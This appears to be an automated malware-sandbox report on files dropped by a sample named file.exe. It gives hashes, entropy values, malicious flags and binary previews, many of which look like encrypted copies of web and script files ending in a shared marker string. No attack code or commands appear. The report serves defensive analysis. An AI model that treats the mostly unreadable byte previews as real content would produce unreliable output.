          Preview:ewogI6.'"ud.qvPv..a.......}k..[.....9..oQ.b6...w.... .\..S......*..<.4Vm=.p.EEI...W.Y....+.,kf.....R..+.`zp0=0.b.7.H .....C(.u.Y.....vm,.....Nv.l..}..).x.(.o........n...<V\...KV.=lc 0...a...qn.*...V-q...M.6.7..u.........}_'.....>...v...I........V...~..o......}K1I.).qT}.....V.....N.O9Z..)(.....2.n......=.H..(.2.h.....Q....W.#.`A88r....F..l...c....G.+R..o\K.7.ti...,..g.Y.....:.&.m..4....O...Y18Im..umw.Q.*y..+....'.i.T...mj.`+.N.e.`z....@..B(@..u.7...wi.K....V......O....'W...=q......O..FU].W..,m!.V+._..C#.F.>2|\.3..s..R...i{)+W.\......5f$0...k.b...er....@..u..Fu.+..Ui..l..S..&y.T..._.....U.B...v0.i.i.....c.}...S....f...h.q<|ir.iQy.vpB.:...*..F.R..zS^.*..6."z....~..Q...v..._./N../.0..|....T?....S.#.Q_...)U..:.I...Zi...&"S7v.....PM._....,.........c...`....2P.JP{9K..A.U.&..1.Z...3...)..@......DO...t*.&.P........!...Q[...c.~.6..P~5....J..:p0+.c...o..>.R.v1...UC#...v....G'...^)u.9..d.h.~.P".{.0..Y.....X>6....Q*a.7C......-..C;.w.{S..W^..6W-'{..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):400
          Entropy (8bit):7.354432465039598
          Encrypted:false
          SSDEEP:12:U22aZuC9LR74HdS/aWvYaJIKEqqaVixpZacii9a:AaZpco/a8YaJIZUiTkbD
          MD5:3266D3756C9BBC8FBE278B0A0DD74E32
          SHA1:D5B85E08F1C5C28C87EC0C3ED896D756D5649C65
          SHA-256:F35DEAE3C9EE8FCACD4D9AF0A3EBBFD7CA5969CE1E9295D08B45F9A084A854AE
          SHA-512:E5309A56D29CC9E8197AB013F104975DD7D00074DD9A9749A22F63AE1CF28BFF77CD997DDB7ADCED16BAF87EB1E84E690DA64F8D08AC12BBCCA647CF0F0EDB45
          Malicious:false
          Preview:1.558h=..1..B......)..@..Xq2(./.npc..f&...Ft...[..:..E...^./.4d...1.D..I.Z.|..w!...rk..T,..o.]:.gG....1T..H/:.;d...l.MA..x).d.....a.g).yl...;j./...J4|; .L.\...e#.D-Ms......[...3^[......%.]YKI1.(. .....~....r]V.#kLa.......U...l!..i.w.k5.9(. ...\...O....=...2..Z.6.....C.I=L.e..H...f...am.t.;..>.(r....6......r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):387
          Entropy (8bit):7.3673616153550165
          Encrypted:false
          SSDEEP:6:YH3RU5qkJZyCNEJq8assMSbnuzzn+/npitt3FVPXqf2I/TBXwIg/2VjGxssZaciD:YHAiC2wYSk+MtVVvALNM/QixpZacii9a
          MD5:9FBD388CA7BACF7C1FC18417E2271C19
          SHA1:8717E49CF386A41E93CE8A5138BE77B9300E01AE
          SHA-256:CA14C8D841220903FF810012FB3844C71E61FA67F60826B8FD4C677E5879E021
          SHA-512:1F5ED8DB4A62CE86EC2F6929BE998FFB483E27673182056B2A767A3CAB57CD1EB11932594C73C82EF642C2966EA8B1B8D215E1A6DD7329AE14DE9C2FC7647E7D
          Malicious:false
          Preview:{"nam.n....../.qd6.9../`.....@..IFa<....{.>A..T^.%97..].*..b3.s... .:.T.:..B...w..i.....t%.b..|...k.R..e.\....$..k>;G.f..Q.3..y..<.. .`....xEzz.v...B..Z...!U.....F..e.3.gHj)..... 0..y-E..8.........0.^..m......'^..-s3...I.!._z.V....R..............3!.>v....6.)uo....f.....A..x[.....h......*.zy.t...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):11901
          Entropy (8bit):7.98501142245534
          Encrypted:false
          SSDEEP:192:k95lFB2LnICk3H1nY1XctW5pqtBaY7lb4Eq9nwfxn96+X3+g7gajAouUFAiSr:krlFB2UPlYpcapqyYpcEqCxA+H+gTjAr
          MD5:A8A880F138B3AA7F0C850FA17C44844D
          SHA1:DD518067D2B39214CA2062A22973DDAD4AE2C806
          SHA-256:26E667AC9EE26FB81ACF706C9383A82E0C1D24B22D0764DF463CFA6334DA87E9
          SHA-512:3E377A187D94EF94D285887F2E63253BC0B2F5837DC3140A602274D540B3EF6192E1C4DC3BA123573F42F96DC23D440CFADC106F7C10E32C2BB1567A68717760
          Malicious:false
          Preview:(()=>Sl.$W^y+.>1.D@.5....}F..J!..H.T&........L.../'.|.{....7.....*...6.k5........1.........8...z.),x.<w.......j....;.k....w\.....@.!... m.Urv.l...u/,G*v..kY.H..|..0..7M....W..&..+.....5...yaG}...A]8.0..h..s.W.iG.$..l.dX.-..V..R....z...s....[JY....6V^_...#.P.-..2k_OB..B...f..~..D3F..r.a..p'T.w..|D....q-.n..|!...q...M^\^...g.OM..5P.%..6..b.s..2.....%.Mdb.f\..7\j.a. bt.CJ>g.. ..;.5.d..px.R.w...m...F5Hw7.1.w&...9.o$.E.9.....D.......(.......B...Z......4.C..P..I...J...z.;...._.5,..~.P.!e.SvB........!fW.f..oCR.C@.s.>e.....ge>..f:8|.V7cD.......b.._q..@."@..]....C..l....N...*..m.{.....E.^L..o.O..,.1.I./$.IK...S.fZ...g....~].......I..V;X.o..H.c;.{.*.[...d.c.i.$C-.[W3..9ns..\-.Z.El..p...K..5grbZ:........I.G.m.="J..B...)....j5.g..G.%.d........8...}.i..v\....@.D.;.)B..h.x.....|*../..}....b..~.......~2.DF....U...ayW...Ff..M.x9k.....4..*..x....v~T.3..k#...@+.0"...0..x.I...Z.c..1).P3....oj.e.......k..!........k$...D. ..VEr..~.K...74..3_sG......m..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1179282
          Entropy (8bit):6.260798970943117
          Encrypted:false
          SSDEEP:12288:ZJTGutnOlUnz4Ua5nK856sJmOBjn2LT8/XH6rewfkb3J0sIV:ZJTGGO+nz4xLcamOB6LT8/bR3esIV
          MD5:7F29BDE5AAC101C5C64B9FF31EB20D9B
          SHA1:87D8A04767E5A0069133158219D538104386C577
          SHA-256:82E356DF2391D20B98C6715898D87A513265F4D82AD823D1A345DF14E0B5B2B5
          SHA-512:15CDA1E2A255E552D2C2607ADE73C8C4FBB2FA9D793690EF52DE821801DEEE99B83B42151B327F01B01E9EA4FF36244043BBF0FEA52A425624FF4EC13195885D
          Malicious:false
          Preview:/*! F........y.......Si...4...L ..?..l8..%O}b=....>.. ..q....~..9.Q...<".`v2gD.R`t!..}.>....$..3.`k....e.V.O.../.W..<Nk..4.|..=..n..io.7.=.! ..j....`.N.g......../W..39..*..\..B...".....3.zu1g...DFx..h.T.za..kz......~...+uq.....$..-.%.5....Z&...m...29.Q....!..pJ...5q.&..4...?....g.".^.......^. 0..8.\w.....(.z.9o.G..u.@vj.....k.?.m.4.v,.V.At.#}...J^..U~8.t..w=.(..`......LJ.8Zg...........'L.!...'67...~I...g2R.-...n..u..#.v......'...<R.....cP......... ....._(...70Y..U]...2..t.y......%...cJ.\.{..JLb.......U%t ..A9u....dV.}...1.~5.l<{8.m..3..*.f~..%tt....... ..{a#..........o...Q..~...........c@.'.AX>...7j....Sm.rh.....G....@.S#Bp..rr,.f........|.....e....IH.6n..~(.j.....-0..0F..X(..N......Uc...i'*..`.p....n.w..T...N.u..S..'....5_.-..|.8..I.@A..'.........z..z./...R6u..........Mq2....&.M..`...K.....D`.fe.R..N.J..C.r.%R.j.i...^f?.@..>U".....G.f.....E.g.z..+$g...9n*.wL..(..m..&....a......T{!....yq^....r..E|.]&W...b.V......t.....].<..B......f.,
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1042237
          Entropy (8bit):6.337872968419407
          Encrypted:false
          SSDEEP:12288:VeN81cEB1hjgczr9QLhbGoHVMunRZm91a9I2SFn4aC:AO1c8hjgcmt6oH2SZm91jFc
          MD5:5D954D362E7B103F0BB4D56EEF350E3C
          SHA1:A2EE6C81CA42FA4E8E2DDE36BF1D7294529A3F3F
          SHA-256:A496972F9CDAA20623FFD145D3D91C69EB5B616F588219F1B79238B591B349E9
          SHA-512:DF833B26DC59B76766A7F3461307C34203625B04E6A2CD3130A1C0AA49D103C675996FB17B18655160CCC000BD6B9FA1E04AC49FDD5D76ED8BE9A550065D90A0
          Malicious:false
          Preview:/*! F.n.g.UrP.....N.......~.g.p..*.....,3c.!.......&.............\%:..,...........df.....9.N...b6.`.~..u.*..g...t...P...!,.=A.P..N..gMz'v.........i.....+QB5...;A..C.N.S.I5...]..a.^.....]o ..~c..?......:.m.......o..Og%.W.....b.nn.Q.+...u?g..z.(QI.b.{.YlZ...#Su.....U...s.D....C......*.n..F...i.0.j?.K...fH....*.g...R7....hSE%..}$..P.....X..*...........:.AE1<..v....2k.&\.....;.N...v.W.5J.....4.|....."!.x?.^pH ..U./1z.y&hO.G....k.=8f5.=A.W".L.I...%....~ X..|.`.....f...K@.J..a.P....L......."..Zu8.5=.S6.H-.(...g...4..6.I...4..oD.ka./.p.PHa..../......F...l...yq/.....O.C.5.....=Bw...!.G.LYc.........h.........D...4.7..4_..+.......b.|.!..NVd.q.U.)...n..........n.......z.....r....}....+.s....x....u.tv.h!...<c..8tzk4yv....,...&^p.......#,5.P.k...Ip.4.p./..i...2.*&v.1.e.........%...........>.......c.....*tv.zhU.b........7......@....8+...z[.JF.@.........A...D...P..S.........t.e/.u..M....9;zCC.l.....j...<..0..p>..c|\.....P.a.....0].c.k.|......@...J.....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1681049
          Entropy (8bit):6.110062821573016
          Encrypted:false
          SSDEEP:24576:jToANPyk1LYkVrB6WpJHdeL4rULhIvRbMwvoutonu:foYykhYkVrB6WpJHdVrULhIvRbMwvou1
          MD5:9EDD26D4F522FBD489CDC2B5A6754E2F
          SHA1:B139699E267855D6B18C0E1E9909C6150B33C84B
          SHA-256:00CEB0BB27DE484288430873E85901334F5EE983DDDB97483C3C66D3E12B8596
          SHA-512:5E69872015F666049EA4C2C11FED6C448284D55B7780D75CD487535776D434FBF9803A968AADAEBD85621D1EC2829D4592D0464E0CAF757B9953E3B43E06767C
          Malicious:false
          Preview:/*! F.......$..)2<.....o..z.V..g.}...H}...%...E.B.7V?~.....+..(........GDcb.| F.KK..Y.....TN.}...d^....!....f....9!|.M@~.S...2...@...i~.fm...G..qw9...M..3..y.pG....=..e...l...`.f.|..E.AB.5l.a..#...@Ud..[H..bf..6.4.....+^~.....m.-./n...?w.y^..T....F.1...E>.+...J....h.X7Z`7. .Y^...3W.s.c.2]..on.6...O...!....LP..0{./v$....M..2i......fX3.....M.%.W)..z.b..0....0.E#.S../.{7@....0.cQ..6CB2R...x.Zv.........y.....t..,Fy.H#.....TBS...6mp.]5:x.?l....`B............B.q.....(.nP.....v.).L.Gb..*.n.$Fh....%.g..e..2A..K.w8.:..s.W~.....\~..i.....N...J.....bC..z....m...~.W..Os....yX...@..j.'s..V....X..@!`.."..2*.r...2..h._........_%.>.kC:......J.t.s..pXy.\....E..O...)O.3\1oyA.....D..f..eU."..6.T.$..1*9_J..f6Ol...N..8....q...]...GfYw.&..W>.*.n..NQ0.....cTY..F.....$p....u...?....T..Cc...v..HS|......LF...=.....}..T7...*.F..I]..3N...K.DQ.\-L..P..N.p.q..c.....j....bfD.=..j.>J(XM.......g.......&@PC....N.Q........X....:..Zh..7..4...~..Y......&...\.n...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):80121
          Entropy (8bit):7.997747106077704
          Encrypted:true
          SSDEEP:1536:fRUahORzkZ+duqK0pkjGqlrE3oHahfJlpcihkPVF3c+Y8kIZQkveBr0:fZUR4Z+0e13o0/pciGP3Yye10
          MD5:0A73CCF3BF82B40CD4BD005782086253
          SHA1:51A9D58A99DAA8B13D7B5304005CE215F40A9BA2
          SHA-256:93F0A70D7D18E8B50DBB2BF70A086FAB7A76EDF824E0E1091BDA85F074E2F7CB
          SHA-512:04F24F0496EA5F2B69F61764ECD3D1CD468CC367BD80F3B4F461B8146A210194EFC87D75EABF35F7E3B252DF58BF40B5857DBA0B7216C581CFF935284C8EA532
          Malicious:true
          Preview:/*! F9..=.o.....sVI42.{|...'...Z......;%6.....&)b.}tK.^j.S...*.K.2h.I...^...?....#..T._..'BEL...!..vD...&.......ejw.v'.S.y^.-.MnU...r....,8#.NDi.._....W..8..lq..\...LKp..QD.}s.CV.....&..o.....".v.1..m..~.n;2R.V.9h...6n....\i.s.V0[.i.a..?L....ib..W......>.4.%bz.Ge:...$.....=s....3e....D.}...v.....=+....-(.....m.c.5.j7S5A"_.{u`@.......m....j...D...e.....C..N.^<..$.....%..J.Pr..ys.g...%Ud.'..G.^.W...e.......f..&..|.~j...Ln.&.zH....7..~.e....+.h....9..d.(.X......)].F/....(..@-...C..S..I....Lr...+!...N..i..pP..@......!I/.....F...e.;2..{.].h.O..Y....<..<C&..I..s.&)..A|...z......<.....lf...9.IQ=....$"....)..../U.;...C.....c.Z.I.....H.......}g.Q...+|Tx`...OZRA.?.G.L|..._h0.B..W.3d.{.r..-(...i:V...P...yA....6....'..<...3...<f._.Y.t.WR.s.!q.k..Q.}....]B...`Q...&.C..G....5...Z......<gy....}..l.p..N+..A.X..*....kzN..|..I.5..... .[L....C._.N..t.].......M..R.r.p.z,M...j...86E.*......^..r....M...d......=.#..8..q.....V.V..p..81h.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):400
          Entropy (8bit):7.3008608002199
          Encrypted:false
          SSDEEP:12:lcCpompUgjY5WA/NgAMWn1bZ/WP/ixpZacii9a:/Rp9k5Weyq1b03iTkbD
          MD5:D601845708571F80F6A40C8465944DF8
          SHA1:8A76A22A4696EC1DDB77528CBD62FF14325D91F2
          SHA-256:0E09F9055DF93E0FD46DCE27949A81F3142528931F836D8ED6DAC491099AFCDF
          SHA-512:D892709E4AD864E70C9156EF36A6D00D0CD45CAA0AE0D717DF73CB507A71B4E6B971906B112E751EC78AAE7335C665A42EDEAE80E967AE7E2AB8ADD92252710D
          Malicious:false
          Preview:1.312.."-.*.w......F.=EY{.c..$.(~..........o.$p..=p.......E'..c%o.%.A.....F.D..Z1....A.'S.RG.ol!.....@E|z....Y..........$..6.C.a.C.......F2`...:.o.Yl.6..F4..B...,......<..Ol..K.0f...Z..V...q.......kM<-./...kK.(K.]....U.jl.1W,..s..e..{.}t...nL8.|<.3[.N{~.x|..n.h.us.C.w..K.../!...I...:4...l...........r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):481
          Entropy (8bit):7.488409010532769
          Encrypted:false
          SSDEEP:12:MjwM9+zNNG5NQgoKSHxrNw5ZuvEIN2Q4fSvlPixpZacii9a:Mjs65NYnrNwWcI1caZiTkbD
          MD5:A3AEF1BF2D5C49C47BF79A3473213C7F
          SHA1:5DCAA66FC8C55BBE4795ADD1EE906EFF1BC0FC94
          SHA-256:9ECDE290F1B10890A8CC0B772AEE3663153DF14F33400EEB85F77D562F1BC0D9
          SHA-512:7273ABF5DA5BC427A578A15B2388245FD59F94E88D816035035E8A504998AC770ABF4BA7A01EE6540C301430A161096D98509CE4AAFACAAFC1D555A82D45DF20
          Malicious:false
          Preview:.{..h....N...Q.....d.ui..>.B=..c..31...]..8.a.`,...dL!.0....d..yx...(a..+......[7.....B5y..$.3.p..|...f.N...>1....x.*Y.apTR...... ..A...W......k.0g..=...N@}.j..mf.(Diy.V=.w..(..........=v...C.7.A1?w.z}-rA.E......v.eq..RX.Of...B..t...........3z.lN..*....z....%X?..I.>...=....Q.9.i%....hT.....H.tjD~......89]....X.K..J..kg....Sk.vd"[.0'.....u.N.h...o......-.'r..@..U....)l.......yo.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):988649
          Entropy (8bit):6.388479033642595
          Encrypted:false
          SSDEEP:12288:wlTUAfGeLJzxqtnzgY6E6GlsV7nNy9xX1cdKXxLMv:gTBOAVqtzBllsVpy9xXmyLs
          MD5:23A971C00A583094AD89947579F6A89B
          SHA1:0924B5CB424038DC51135F714C659653323FDD99
          SHA-256:D381B3532B531255C29BACCA19A6558D8DF9325A37831F472857B8D9C0476803
          SHA-512:5AB476E4BFD6EDC82D0F8495D2739227C5F32857A768AC3FE4A7B0BB029CAAC20801F3164664A96DA8FEA82087F6F1889AA7A9FAED845EFFAA4D3D3BF190BA65
          Malicious:false
          Preview:/*! F.5QP.....@.....)...'[.......s.........ot..../...i...Ho..qN.P..=..:..Jo...:...y.!......i"Om..7..A@.........(..@.y\E.....2...0.......2K...]..8m..h..bw.>..K...YmqW.:........|$q..`.."n.....2...$V..V..iP.u.....UY.z`n/z...U.\N..cq0....k2..[.j2..T.6'..I.......y...(...Q.G".....(....s.Y./....v.M+Zh.....KBM..y....D]q-....jc..l.I.......z*C....G....;h.?....&..-.Gdc.^yf........i..X.+1h.t.h....Y.....q..t.d.W.]....V..D.c.f._H.....D..;#..4.77..c>."....R~...[...k......o...N.k.....#1..*.<..S.o.......5..@...X..Oc.bU..X.u..D/.;..A.hSp@*.Y..........1...._...?.5.}.....C.k.v:Q.\.$V.w?.F..X..P.\...u{..8ac..^F.[..R1......YY.L.5..2....:.Z.,:B..8.....5...9;"u:..=.u.I.x{...M.pz..c....6.=L...}2{.U1......=.!.%..+...%1..m.h.W.....g..V..$$.xy...c....RP...DifW.M?7..p.<3t.w".EL......w......Q}..+e(.T..;kE......z."87........}..P:%n<.V....>.&....K.)^..#.....Xx. .&.ZzZ.&<3.t.............a......I.!.q........gY.Z@4'..c..S....:R..1...Yi...kh)..i..X.]..k.......n..o.w....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1679
          Entropy (8bit):7.870559203703039
          Encrypted:false
          SSDEEP:24:aua7QSK/fX8mT72TWBu/hhAHgzVwbw57HrJRfgAgL5guX79+CjBiuo2iTkbD:a7kfXXT72phAHYmbk7HFlgr5X793oziD
          MD5:5E4EDC539C0DF4EFB01CA85326CE8537
          SHA1:AF979D4029CD677EA80DF49804B303DAD4C40522
          SHA-256:E065090D79664DC112E2BF0C6ECFD57B3CF77934EB747CA9D06BCCB44547A48D
          SHA-512:9004321D4E44519900217C77CBCE7215398C09D36DF83EF9EC93CAC9CE9068282302D71945CA0B6BA8BB8629DCC25CCFBBC6293180FDFE91A781B6F5E6E0FE20
          Malicious:false
          Preview:<html!.g..l..o'[.~}WI.g........I.x.}?9.O.M.g.|.F.7vI.....-|.1. .O....2..N..o{g|...ExV.Z.p..H.p.ee~.*3.*.:J.....gB,Lc...80....KkgC(q...E'B,.M"7k.yV.'.@J1.j.B.rD.v.3K.e1L...$....Q<n(x....~..ki.U...H....l/x]....@..*T.?.e.NC...+|m....C@........B...3.0..yR..~..u..T.E.<.9...^..p..o...o.......J...7..uv..GU[...f...&.9...I...^.*#/...kU.G...c:..T .7A..,.IR.D.J.J.$.v.6......^..-...?.I.GkU......y,1zT.f`:.A.]..V?.....Q...;........^.+...-XP.....xe:v.m...f."....\R.r.?.!.pV.F.!k.$..p.fZ"8^..J.. .=.....K.. .t.........2.w:.u...B.._..,..n\.....x2...e.m...;. ..o..E.....$.~%$....%p......|.g....\....K.6.v.x.,.S.....".V.R....<..E.....KyIx....?1.....=.z2e...m."..!.(....y.<.o......V.3.A....^wP}.....V.6Ld...s.....u...)..;.N.f..H...n......R.....p7...1X....ZK..._.^C.8.N.S....V...^?......{.R..)`..r...x.Q.jAWi.R....-.....u.J.....X.R..t.n.{.K)..B)....Z.`..4q.Z.N..`..n...X..au|Y...z...HR...X..N._`i.%......Vxga..%."...y..b.A....]p'..\..q..RaE...\.#....O..]q.^...-..~V..\....]
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1892
          Entropy (8bit):7.9044694834227345
          Encrypted:false
          SSDEEP:48:EmXCP29zl3ZjtLGzAqd/OrGMQKDBfqPPdFU4iD:EfOppZLGsqdmrG5sq3dC
          MD5:7FF528F699E6C4A85B9AFF95C8A39065
          SHA1:3D17E008BA6FFB10904DCFCF80FEC358EE520687
          SHA-256:09A380B54DF2BA57ED1DD2B0FDDF11C6BE21845142ABFAA74C5C1819458D6B61
          SHA-512:D292EE76A24CB6EDF995442CA675E0D7ECC0B19362E16E65F0B9E1DC0F7DF5CEBBF9A5D09E3FDB3F60158D60CFB5D2DB078A52CF30868585CCFE98DF09E20668
          Malicious:false
          Preview:<!doc..gq`...._?...8..A0_...S.z.Jp...a..T..."...qT..w..-....Qt..Vx.R.Y.c.....;_...U..s.`.C<V.]...n8.&......B. ......r<...^T.Ui...J.../>....%0.t..]..p.B.-..B........1mU..z..E....Ro.\3....U..v.N.$w./x..rw.e.!.......p.R&.....j..H.L"..@...A.....W..^.h(....G.3..e.P.eM....;.\?Rs....|`..9.T\STuq..<].!<.z..\h....qjG....|'.W..g.....b.Y.t.oV....o3...f....S..]...O..!..*.b.......#d.D.Y~.. .c...@.... ..+.k4F..:\;...........N.4\..|. ...C.w5.;...;.p..t._.u..w.|x..I.}.K.....u..=.C..4:...[G.J.t9.U..U.....Y......vp9.O).a......j........q*:.-wkA.'.(.,..#..b.....Go.X.+........F....B.}8?..G......o.U;C...0..;.:" .....~.Nkul...../...[.z0.9'h6wP.s(-~H.........s.Z...2..b.W..BKh.X.CHr[.K....m.=e..%H>.377w.+&...X.^....U.q...D.........-0.E...T..q...2...P.@..9\R....;...].\#C#u5IW..w%.A.p.p[|.+O.9..D.d.v.$........Q..$..CmE...CM.hi.e.*..........(38...TP..=tU.6E.?.j2.|0.fK...6V.d...;.4r...A.m..+...W..]7l...K.y\.n.CLB1.)%.^,tJ...<.*. \.,...+"9;4../.....j.........4.F^.{
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):363249
          Entropy (8bit):7.125126701477027
          Encrypted:false
          SSDEEP:6144:4+q3lZLqA/s/iyEvgOQpuHp1hE1+NjtQ6PcH3MWf9FE5PdwGvPJvUcr2GLA:uTqA0/izvgtQHp1i+VUH3M49OZqcrVc
          MD5:53C0AB1BD85FAEF896A04BAD02903334
          SHA1:A1C6B89F14BADEACD90BD159A9C24F145970E8AB
          SHA-256:DDC059222CDBB27F8147A4B4C06D0C072D23C1E7B7849083F2D33D85BA385C11
          SHA-512:A79C9DC5BC420B15E61F5BE05327B550783FC7247E5139ED4852B1D1D226B086D1504EFD18F8F53D485E2452E0B11206FFD476C76EFEC179EBA3C202F4F0F6F4
          Malicious:false
          Preview:/*! F.r..I..\A....ghqj.V.....B..OO.F.G.E6....H"C...W.>..;..B.@t...... ..X.#...|`..+.".k..9..\q..PYi...:..GF.*..J....ms.....,...l`].)*..;"_:.......\.|.3P.mER"<.+..3.+\....J.Jx.L...}#..wx......K....^JY....#.....|.....0.A.&.,.....<.......1...Q1.2._.sC....=.h..LV"..`-...(.p.eg*($cxs2....../6....}.r+.-.^:...|...E...F(c<%.G.Ma^..T...f.@I..?....p....^.b.!....S.$U.#.|..Y.o .L..3....z.=.>..OI.J.......^....![.......Y@.I...`{...M;.Q.D....S...*.1...-..Cn.R...X...Z.:.F....7..#."/.....k.....>Md....[?"....j...,%.R@;./......y...%\..q>....2..p..;.....tu..w@..[n.W@..d.(.YA>.M.JM.&.....k...T......F..6.lF.Z-..t...e]....D~&.*. ..m9...02.D...M......8v./.l..$.....>..o...g....1.}t8.y`..%..kI.TQ...m...._g...d@..L.j..1VWo.~........:.Ve+.Ef.....6e.c....-.`..Ri.WO.*(......p:6..]+...P21..Z..K...v.f..d.?E..mal.).....z.x3s>.t.K..9..."`....g8oR7..R.~A."...c..e..P...,%..u.v2..<...L.s...._...T#Q6.T..~Fy..!...uK.m&Pc..)mRf.<.....<..Ao.._..x.N..gV.T.{R..t.%..DT.H..fhI.z.D
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):629
          Entropy (8bit):7.658073131111198
          Encrypted:false
          SSDEEP:12:UfzgXxTS3FJmpjmT+nkE3NnaeUq6ikm9flwfOMUdtC/ixpZacii9a:8+xW32jmAV7/tTFlkOMUdc/iTkbD
          MD5:CC30D4AED5A7DAB1CA127F94223FC4F5
          SHA1:834E6A5FB961DDCEB6DE1D6B0655F08ADF12624C
          SHA-256:C0C0376059DBC6D811D0A6FEE473855AB80D7130EA4CD941952DA7063DDAA736
          SHA-512:05A497BD9609368BCDA9B30AD70DC29F6AC168E858B0375F0B1F9978E3281AC7ABAD6226318E6F77C0439E4C2A578141A44B144F953BDB6585007A099B5DC5C6
          Malicious:false
          Preview:/*.ob=.......f.iI.......J..[S..gM...'...#....[._.H..^..uw..e...C}..[.H.G.4e...../1..w...W...1.u..ar..0B.v.t....Z..c.X'...G.M.OM{"..'?.......^.~..k}..y..cmg...x....s.a.L.$.WL.~...S....F./.#.d.....L..........vm`U/./...Q.3%.~.h.....|..^....r`.Bq.&.......0.^P...0.,...u..mb..m.Q....C...${....K......wE4.o.puA..........}F....f.$..V..b.-IM|..IW.]../.I..o..Ue{...B.HG.1..P...)"..2K..b.I8"K..R.......<+x.n7.].-.z.l.%A.].uy.<..:..8m..u.t...`.....p9...@...Dz.65.^.M...GZ..U.\`}t.~...<.v...~.9...."f..^.........QI>.7o=.....~...C..@...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1375
          Entropy (8bit):7.837179554206055
          Encrypted:false
          SSDEEP:24:9gROEIHdj+SGQqmmtw57tYmKbcS34LI3KZN95q9W+F6zH0MqIqKO1iTkbD:+RRIHFilmmtwFtYmKbRILQKZdv+F6wG+
          MD5:B178912D8A059CBB152187C16ED706C7
          SHA1:4AEC4CBEBD6FE79E726A8B493CDB94666634E3BE
          SHA-256:6FBBAD55ECB8738DE5399351408D70B183994D062F02D0AC4A7D9B1B091BA6D3
          SHA-512:3AFDE7B4D4ECFBBB969C8AF5DCCD8D065477142987895394D023F282C96DE54C3DFD17C37EF56D71D1E46A8587531C94982D8942E284CBF3D1D6D1F368D1AA36
          Malicious:false
          Preview:(()=>...F...^.Gg.......UI....!.u...=qO..{....g)..0......k...)h..-5F.J...v{......aI..d...q....(....'!..*"zc.(I..F.H.u./...m.@5.5..O...H..g......a .4....6.J....8....:......@U..i<F.03.r......Gfq...|.H.92.....!....,...J1[...'.h..UR..T.7.1-....W?...|.x,.<02^...Xe..E..c!.Vu.C.C!...|-a.'$..2s=.=+.`L....J3).o. t..i..-.8..Y'..w..2L.)?5..HS..t...f~j..R......~Xs....$..c.9't......>].4.:..s,W.n..(jx.K.B.............m..:c...O..|s..@..y.....<.'..<l......m'..{-? h..e2..4>.M...m..f..2H...B].bB...:......s.F.N.x.u/|.(k..R..+.G.^..I".tN.R....BI%. ...`...B3...[.~...eg.y.-...m..$SB...B/.Eh..,>F..5J...q.${R.T<...u...;@.4(..\.....X..<h+...%Xp:.IT...<(...d2..C8..*.M<_.D./..'.?......2..'Ne..n.R...&.B..A.....4.L#..2....1(0...-.Y(.o4@.D..Q.....`..e.b...Y+L.Z..M..420:.XA>6.-..Vf..}.=.Zn.h..Z.....+.......'V"U..4..>T..>..8Mz..l'."Lm..Bx...E...:%.L.m ..N..`^.d....4.$:Td.mm&.!..a.\!.d.@.`....n}....G.C..,3..O+..>....Q&....U.k..E.-j.A.8I.v....@.y.4x.....A*.Jg5...L>c.q...q..(..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):493440
          Entropy (8bit):6.993919621388003
          Encrypted:false
          SSDEEP:12288:ui/ZtMIyvux2vZtpKgh9WE1NVYFQ7Mjh5+kJSe3JZkJT3jucyEfQHe3JMqDcMrqk:XZtMIyZtD9WE1NVYFQ7Mjh5+kJSe3JZI
          MD5:F1CD0F446E85CE86E6527E9DDB0701B1
          SHA1:BB7111A946313F5B982AB948231CE8C881070DC9
          SHA-256:1DC55402D88E5C2791C85FE651F73C1E13568A2AC0EC44050182954AAB09455A
          SHA-512:192CEC46592CA1EB588AFC0464283B2758CF4DD5A9D8A50C574147C862EBC4EC24D7CFCCB7C0F046092C0ACC597D7FF1BE0132AAE41CD5E92297176B122B651B
          Malicious:false
